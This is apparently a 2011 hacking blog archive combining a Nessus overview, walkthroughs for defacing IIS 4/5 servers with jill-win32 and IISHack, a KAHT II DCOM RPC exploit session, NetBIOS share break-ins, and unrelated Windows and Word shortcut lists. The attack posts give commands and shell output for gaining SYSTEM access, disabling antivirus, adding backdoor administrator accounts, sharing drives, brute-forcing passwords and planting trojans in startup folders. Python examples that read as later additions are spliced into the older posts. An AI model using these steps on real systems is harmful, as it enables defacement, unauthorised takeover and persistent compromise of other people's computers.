Monday, 31 October 2011

Nessus Security Scanner

According to the popular consensus, Nessus is by far among the best choices of vulnerability scanners. What’s more, it is released under the GNU (GNU’s Not Unix) General Public License (GPL) and can therefore be obtained and used at no charge.
The following are some of the features of Nessus:

Plugin Architecture. Each security test is written as an external plugin. This means that you can easily add your own tests without having to read the code of the nessusd engine.

Nessus Attack Scripting Language. Nessus Security Scanner includes the Nessus Attack Scripting Language (NASL), a language designed to write security tests easily and quickly. (Security checks can also be written in the C programming language.)

Up-to-Date Security Vulnerability Database. Nessus focuses mostly on the development of security checks for recent security holes.

Client/Server Architecture. Nessus Security Scanner is made up of two parts: a server, which performs the attacks, and a client, which is the front end. You can run the server and the client on different systems. That is, you can audit your whole network from your personal computer, while the server performs its attacks from the mainframe, which is “upstairs.” There are three clients: one for X11, one for Win32, and one written in Java.

Test Capability on an Unlimited Number of Hosts Simultaneously. Depending on the power of the station on which you run the Nessus server, you can test 2, 10, or 40 hosts at the same time.

Smart Service Recognition. Nessus does not assume that target hosts will respect the Internet Assigned Numbers Authority (IANA) port numbers. This means that Nessus will recognize an FTP server running on a nonstandard port (say, 31337) or a Web server running on port 8080.

Multiple Services. Imagine that you run two or more Web servers on your host, one on port 80 and the other on port 8080. Nessus will test the security of both.

Cooperation Tests. The security tests performed by Nessus cooperate so that nothing useless is done. If your FTP server does not offer anonymous logins, then anonymous-related security checks will not be performed.

Cracker Behavior. Nessus does not trust that version x.y.z of a given piece of software is immune to a security problem. Ninety-five percent of the security checks will actually perform their job, so be prepared for it to try to overflow your buffers, relay some mail, and even crash your computer!

Complete Reports. Nessus will not only tell you what’s wrong on your network, but will, most of the time, tell you how to prevent crackers from exploiting the security holes found, and will give you the risk level, from low to very high, of each problem found.

Exportable Reports. The Unix client can export Nessus reports as ASCII text, LaTeX, HTML, “spiffy” HTML, and an easy-to-parse file format.

Full SSL Support. Nessus can test Secure Sockets Layer (SSL)-wrapped services such as HTTPS, SMTPS, and IMAPS. You can even supply Nessus with a certificate so that it can integrate into a public key infrastructure (PKI).

Smart Plugins. Nessus will determine which plugins should or should not be launched against the remote host. This option is called “optimizations.”

Nondestructive. If you don’t want to risk bringing down services on your network, you can enable the “safe checks” option of Nessus, which makes Nessus rely on banners rather than exploit real flaws to determine whether a vulnerability is present.
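To make the “Smart Service Recognition” and “Nondestructive” points concrete, here is an added example (not Nessus code and not a NASL plugin) of how a banner-based safe check works: the service is identified from what the banner says, not from the port it answered on, and the version in the banner is compared against an advisory table. The product names (ExampleHTTPd, ExampleFTPd, ExampleSMTP), the fixed-in versions and the banners themselves are all constructed for illustration; real banners vary far more than these three patterns cover.

```python
import re

# Constructed advisory table for hypothetical products: the first version in
# which a (made-up) flaw is fixed. A real scanner ships thousands of these.
FIXED_IN = {
    "examplehttpd": "1.10.2",
    "exampleftpd": "2.4.0",
}

# Service is recognised from the banner text, never from the port number.
# Each rule captures (product, version).
BANNER_RULES = [
    ("http", re.compile(r"^HTTP/\d\.\d \d{3}.*?Server:\s*([A-Za-z]+)/(\d+(?:\.\d+)*)", re.S)),
    ("ftp", re.compile(r"^220[ -]([A-Za-z]+)\s+v?(\d+(?:\.\d+)*)")),
    ("smtp", re.compile(r"^220[ -]\S+\s+ESMTP\s+([A-Za-z]+)\s+(\d+(?:\.\d+)*)")),
]


def parse_version(text):
    """'1.10.2' -> (1, 10, 2); components compare numerically, not as strings."""
    return tuple(int(p) for p in text.split("."))


def version_lt(a, b):
    """True if version tuple a is older than b; shorter tuple is zero-padded."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))


def recognize_service(banner):
    """Return (service, product, version) from the banner alone, or None."""
    for service, rule in BANNER_RULES:
        m = rule.match(banner)
        if m:
            return service, m.group(1).lower(), parse_version(m.group(2))
    return None


def safe_check(port, banner):
    """A 'safe check': decide from the banner whether the build is older than
    the fixed version. Nothing is sent to the service, so nothing can crash.
    'affected' is None when the product has no entry in the advisory table."""
    hit = recognize_service(banner)
    if hit is None:
        return {"port": port, "service": "unknown", "affected": None}
    service, product, version = hit
    fixed = FIXED_IN.get(product)
    affected = None if fixed is None else version_lt(version, parse_version(fixed))
    return {"port": port, "service": service, "product": product,
            "version": ".".join(map(str, version)), "affected": affected}


# Constructed banners, as a scanner might collect them from one host. Note the
# web server on 8080 and the FTP server on 31337: port numbers tell us nothing.
SAMPLE_BANNERS = {
    80: "HTTP/1.1 200 OK\r\nServer: ExampleHTTPd/1.10.2\r\n\r\n",
    8080: "HTTP/1.0 200 OK\r\nDate: Mon, 31 Oct 2011 00:00:00 GMT\r\nServer: ExampleHTTPd/1.9\r\n\r\n",
    31337: "220 ExampleFTPd 2.3.4 ready.\r\n",
    25: "220 mail.example.test ESMTP ExampleSMTP 4.1\r\n",
}


def scan(banners=SAMPLE_BANNERS):
    """Run the safe check over every collected banner, ordered by port."""
    return [safe_check(port, banner) for port, banner in sorted(banners.items())]


if __name__ == "__main__":
    for finding in scan():
        print(finding)
```

Because the check never sends a malformed request it cannot bring a service down, which is exactly the trade-off of “safe checks”: it also cannot tell a backported fix from a vulnerable build, so a banner-only finding is best confirmed against patch records or re-tested with the destructive checks enabled in a maintenance window.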

Security Architecture

Security provided by IT systems can be defined as the IT system’s ability to protect the confidentiality and integrity of processed data, as well as to provide availability of the system and its data.

“IT Architecture” may be defined as a set of design artifacts that are relevant for describing an object such that it can be produced to requirements (quality) as well as maintained over the period of its useful life. The design artifacts describe the structure of components, their inter-relationships, and the principles and guidelines governing their design and evolution over time.

Consequently the definition of “IT Security Architecture” may be considered as:

The design artifacts that describe how the security controls are positioned and how they relate to the overall IT Architecture. These controls serve the purpose to maintain the system’s quality attributes, among them confidentiality, integrity and availability.

Security qualities are often considered non-functional requirements when systems are designed. In other words, they are not required for the system to meet its functional goals, such as processing financial transactions, but are needed for a given level of assurance that the system will perform so as to meet the functional requirements that have been defined.

In recent years there has been a trend towards a hierarchy of control objectives, controls and specific technical implementations of controls, which are implemented within a given security architecture in order to meet the security requirements.

Server Hacking

IIS ( Web server/web page) hacking

IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing an IIS server is actually very easy. A lot of system administrators do not load patches on their IIS servers, so they are the people who get defaced (hacked). The IIS servers I will show you how to hack are IIS 4/5. IIS 6 is the industry standard at the moment, but there are still a lot of IIS 4/5 servers online. The way IIS servers are hacked is through buffer overflows and exploits: a certain code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there are a lot of IIS hacking tools, making it easy for anyone to hack an IIS server. Not all web servers run on IIS; there is a lot of other web server software out there, like Apache. We will only be dealing with IIS servers.

Firstly you have to find an IIS server. Dreamscape IISscanner is very useful. It gives you the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS servers, and which version the host is running. Another way is to telnet to the IP on port 80. In the DOS prompt (Start, Run, CMD) type: telnet 196.35.45.21 80. It will open telnet and show you which IIS the host is running. Web servers normally run on port 80, but it can be any other specified port.

If you find an IIS server, it's time to DEFACE it :) Go check my IIS hacking page for IIS hacking programs. We will use Jill-win32 first. It exploits an IIS5 printer overflow. In the DOS prompt (Start, Run) run jill-win32. It will show you this:

iis5 remote .printer overflow.
dark spyrit < hack@me.org> / beavuh labs.
usage: jill-win32

An example of how to use it:

jill-win32 196.65.56.32 80 196.89.65.45 69 - here 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs its IIS service on, 196.89.65.45 is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, where TFPD32 is listening.

Here is another example:

Download IISHack and do the following :

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.hackme.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)


C:\WINNT\system32>whoami

NT AUTHORITY\SYSTEM
For those people who don't have a clue what's going on here, go the script kiddie way and download the other GUI (graphical user interface) IIS hacking programs from my IIS page and let the program deface the web page for you. There are a few IIS tutorials in the Windows Hacker misc section.


MAC address

Getting a PC name, MAC address and user name logged on

So you would like to know someone's PC name, the MAC address of their network card, or the username currently logged onto the PC? It can be very useful to have this info on someone. Their PC name can be their own name or company name. Their MAC address is the address of their network card, which is static, meaning that it never changes. Their username can also be useful if you would like to know this person's name. All of this can only be retrieved if the person has a network card installed on their PC.

In the DOS prompt (Start, Run) type in "nbtstat -a IP"

Example: nbtstat -a 196.35.24.15. It will show something like this:

Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
PCNAME <00> UNIQUE Registered
DOMAINNAME<00> GROUP Registered
PCNAME<03> UNIQUE Registered
PCNAME<20> UNIQUE Registered
DOMAINNAME <1E> GROUP Registered
USERNAME <03> UNIQUE Registered

MAC Address = 00-22-AE-43-33-30

It will show you the PC name, the domain name if it is connected to a domain, and the user name logged onto the PC. The MAC is static, meaning it never changes, which is useful for identifying someone. If your buddy attacks you, you check his IP, do a "nbtstat" on him, and you get his MAC address. So now if you check on his PC and see it has the same MAC address, you know it was him attacking you.
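As an added example (not part of the original post), the following Python parses an nbtstat -a listing like the one above into a structured record, using the meaning of the NetBIOS name suffixes to tell the computer name, the domain, the logged-on user and the MAC apart. The listing is embedded as constructed sample input; the parser assumes NetBIOS names without embedded spaces and accepts both "NAME <00>" and "NAME<00>" spellings, since both appear in real output.

```python
import re

# Constructed sample with the same content as the listing above, laid out
# with the column padding real nbtstat output uses.
SAMPLE_NBTSTAT = """\
Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    PCNAME         <00>  UNIQUE      Registered
    DOMAINNAME     <00>  GROUP       Registered
    PCNAME         <03>  UNIQUE      Registered
    PCNAME         <20>  UNIQUE      Registered
    DOMAINNAME     <1E>  GROUP       Registered
    USERNAME       <03>  UNIQUE      Registered

    MAC Address = 00-22-AE-43-33-30
"""

# What the common (suffix, type) pairs in a node status reply mean.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "workstation service (computer name)",
    ("00", "GROUP"): "domain or workgroup name",
    ("03", "UNIQUE"): "messenger service (computer name or logged-on user)",
    ("20", "UNIQUE"): "server service (file sharing enabled)",
    ("1E", "GROUP"): "browser service elections",
}

# One table row: NAME<xx> TYPE STATUS, optional space before the <xx> suffix.
ROW = re.compile(r"^\s*(\S+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.M)
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


def parse_name_table(text):
    """Return [(name, suffix, type, status), ...] for every row in the table."""
    return [(name, suffix.upper(), kind, status)
            for name, suffix, kind, status in ROW.findall(text)]


def describe(text):
    """Annotate each row with the meaning of its suffix, for a human reader."""
    return [(name, suffix, kind, SUFFIX_MEANING.get((suffix, kind), "other"))
            for name, suffix, kind, _status in parse_name_table(text)]


def summarize(text):
    """Derive host facts from the table: the <00> UNIQUE entry is the computer
    name, the <00> GROUP entry the domain, and a <03> UNIQUE entry that is not
    the computer name is the logged-on user (messenger service registration)."""
    rows = parse_name_table(text)
    computer = next((n for n, s, t, _ in rows if s == "00" and t == "UNIQUE"), None)
    domain = next((n for n, s, t, _ in rows if s == "00" and t == "GROUP"), None)
    users = [n for n, s, t, _ in rows if s == "03" and t == "UNIQUE" and n != computer]
    mac = MAC.search(text)
    return {
        "computer": computer,
        "domain": domain,
        "user": users[0] if users else None,
        "file_sharing": any(s == "20" and t == "UNIQUE" for _n, s, t, _st in rows),
        "mac": mac.group(1).upper() if mac else None,
    }


if __name__ == "__main__":
    for row in describe(SAMPLE_NBTSTAT):
        print(row)
    print(summarize(SAMPLE_NBTSTAT))
```

Two practical caveats: the user entry comes from the Messenger service, which only registers a <03> name while that service is running, so on systems where it is disabled the "user" field stays empty; and although the MAC in the reply is the remote adapter's own (it is carried inside the NetBIOS node status response, so it survives routing), a MAC can be overridden in the adapter's driver settings, so treat a match as strong evidence rather than proof.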

Hacking a PC with a exploit


What is an exploit? It's a poorly coded piece of software which you can use to gain access to the system. There are many exploits available for the various MS Windows versions out there. The Windows Hacker exploit download page has compiled exploits.

Now if you're a n00b, you don't know how to compile an exploit; basically you need some programming experience, so go learn how to program. Most exploits are written in C++, so try Bloodshed Dev C++, which you can use to compile exploits.

Read this tutorial about compiling exploits.


But you can download exploits which other people have already compiled. If someone updates their PC when new exploits come out, you can't exploit them, but if they don't update and install new patches, the chance that you can exploit and gain access to their PC is big.

Check this example of how an exploit works:

KAHT II - MASSIVE RPC EXPLOIT

This is an exploit for Win2k/XP and it's already compiled; you can download it from the Windows Hacker exploits section.

This is an explanation of how to use it:

1. Get target IP, make sure it uses XP or 2k

2. Download exploit tool
(make sure to deactivate your AV)

3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101

note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1

4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------

Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

5. NOW.. YOU ARE IN TARGET DRIVE

6. Then you may add a user
C:\WINNT\system32>net user myuser mypassword /add
(myuser is the user name, mypassword is the password)

7. Add the user to the admin group
C:\WINNT\system32>net localgroup Administrators myuser /add
(localgroup is the target group type, Administrators is the group, myuser is the user)

8. Sharing drive
C:\WINNT\system32>net share c=c:

9. Exit from target.. don't forget!
C:\WINNT\system32>exit

10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here

There you will now have a mapped drive to the target PC and an administrator account.

Hacking a PC through NetBios shares

Finding PCs with shares over a LAN or over the internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and print sharing enabled, so mostly computers with a network card. If you find a computer with a share, use Windows to connect to that share.
Go to START, RUN and type in "\\IP\sharename". Example: "\\198.55.77.216\c" or with the PC name "\\pc1\c". Then you will have access to the share, to delete, copy or rename files or directories, depending on what it was shared as, but most people share things with full access and no password. If you find a PC with shares but it asks you for a password when you try to connect, the easy way to crack it is with PQWak; this program brute-force cracks the password for you (Win9X only).

Windows NT/XP works through permissions, so if something is shared, it is shared with permissions on the folder, and permissions are given to a user name. But a lot of people make shares with full access to anyone. On Win2K/XP, accessing a share like the C$ share will ask you for a username and password. If no password was specified by the person whose PC it is, try the username Administrator with a blank password. Most people have a blank administrator account password, an easy way to get onto their shares.

On Windows 2000 and XP you can use Venom or Starbrute to brute-force or dictionary-crack local accounts.

If you gain access to someone's hard drive, copy a trojan server file into their startup folder; then when they reboot their PC, the trojan will run and you will have access to their PC through the trojan.

Tuesday, 21 June 2011

How to Create Run Commands

How to Create Your Own Customized Run Commands

The Run command on the Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to its location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command Prompt (cmd), Calculator (calc) etc. So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.
Creating the Customized Run Command


Let me take up an example of how to create a customized Run command for opening Internet Explorer. Once you create this command, you should be able to open Internet Explorer just by typing “ie” (without quotes) in the Run dialog box. Here is how you can do that.

1. Right click on your Desktop and select New -> Shortcut.

2. You will see a “Create Shortcut” Dialog box as shown below

Create Shortcut

3. Click on “Browse”, navigate to Program Files -> Internet Explorer on your root drive (usually C:\), select “iexplore” as shown in the above figure and click on “OK”.

4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie”. Click on “Finish”.

5. You will see a shortcut named “ie” on your desktop. All you need to do is copy this shortcut and paste it into your Windows folder (usually “C:\Windows”). Once you have copied the shortcut into your Windows folder, you can delete the one on your Desktop.

6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.

In this way you can create customized Run commands for any program of your choice. Say “ff” for Firefox, “ym” for Yahoo messenger, “wmp” for Windows media player and so on.

To do this, when you click on “Browse” in step 3, just select the target program’s main executable (.exe) file, which will usually be located in the C:\Program Files folder. Give this shortcut a simple and short name of your choice and copy the shortcut file into the Windows folder as usual. Now just type this short name in the Run dialog box to open the program.

Friday, 17 June 2011

REGEDIT Keyboard Shortcuts


Searching:
"Ctrl+F" -- Opens the Find dialog box.
"F3" -- Repeats the last search.

Browsing:
"Keypad +" -- Expands the selected branch.
"Keypad -" -- Collapses the selected branch.
"Keypad *" -- Expands all the selected branch's sub keys.
"Up Arrow" -- Selects the previous key.
"Down Arrow" -- Selects the next key.
"Left Arrow" -- Collapses the selected branch if it's not collapsed; otherwise, selects the parent key.
"Right Arrow" -- Expands the selected branch if it's not already expanded; otherwise, selects the key's first sub key.
"Home" -- Selects My Computer.
"End" -- Selects the last key that's visible in the key pane.
"Page Up" -- Moves up one page in the key pane.
"Page Down" -- Moves down one page in the key pane.
"Tab" -- Moves between the key and value panes.
"F6" -- Moves between the key and value panes.

Others:
"Delete" -- Deletes the selected branch or value.
"F1" -- Opens Regedit's Help.
"F2" -- Renames the selected key or value.
"F5" -- Refreshes the key and value panes.
"F10" -- Opens Regedit's menu bar.
"Shift+F10" -- Opens the shortcut menu for the selected key or value.
"Alt+F4" -- Closes Regedit.

Microsoft (MS) Word Shortcut Keys

Keyboard shortcut -- Result in Microsoft Word

Ctrl combinations:
"Ctrl+A" -- Selects all in the current document.
"Ctrl+B" -- Bold text.
"Ctrl+C" -- Copies the item or text to the Clipboard; it can be pasted using Ctrl+V.
"Ctrl+D" -- Displays the Font dialog box.
"Ctrl+E" -- Centre alignment.
"Ctrl+F" -- Displays the Find dialog box, to search the current document.
"Ctrl+G" -- Displays the Go To dialog box, to go to a specific location in the current document.
"Ctrl+H" -- Displays the Replace dialog box.
"Ctrl+I" -- Italic text.
"Ctrl+J" -- Full justification.
"Ctrl+K" -- Create hyperlink.
"Ctrl+L" -- Left alignment.
"Ctrl+M" -- Tab.
"Ctrl+N" -- Creates a new document.
"Ctrl+O" -- Displays the Open File dialog box.
"Ctrl+P" -- Displays the Print dialog box.
"Ctrl+R" -- Right alignment.
"Ctrl+S" -- Displays the Save dialog box.
"Ctrl+U" -- Underline text.
"Ctrl+V" -- Pastes the copied item or text from the Clipboard at the current position in the document.
"Ctrl+X" -- Cuts the selected item or text to the Clipboard.
"Ctrl+Y" -- Redoes the last undone action.
"Ctrl+Z" -- Undoes the last action.
"Ctrl+Enter" -- Insert page break.
"Ctrl+F2" -- Show print preview.
"Ctrl+F4" -- Closes the active document window.
"Ctrl+F6" -- Opens the next document window.

Function keys:
"F1" -- Get help or use the Office Assistant.
"Shift+F1" -- Context-sensitive help.
"F2" -- Move text or image.
"Shift+F2" -- Copy text.
"F3" -- Insert an AutoText entry.
"Shift+F3" -- Change the case of the selected text.
"F4" -- Perform the last action again.
"Shift+F4" -- Perform a Find or Go To action again.
"F5" -- Displays the Go To dialog box, from which you can also Find and Replace.
"Shift+F5" -- Move to a previous revision.
"F6" -- Go to the next frame or pane.
"Shift+F6" -- Go to the previous frame or pane.
"F7" -- Launch the spell checker.
"Shift+F7" -- Launch the thesaurus.
"F8" -- Extend the current selection.
"Shift+F8" -- Shrink the current selection.
"F9" -- Update the selected fields.
"Shift+F9" -- Switch between a field code and its result.
"F10" -- Activate the menu bar.
"Shift+F10" -- Display a shortcut menu; same as right-clicking.
"F11" -- Go to the next field.
"Shift+F11" -- Go to the previous field.
"F12" -- Save File As, equivalent to the Tools menu.
"Shift+F12" -- Save document, equivalent to the Tools menu.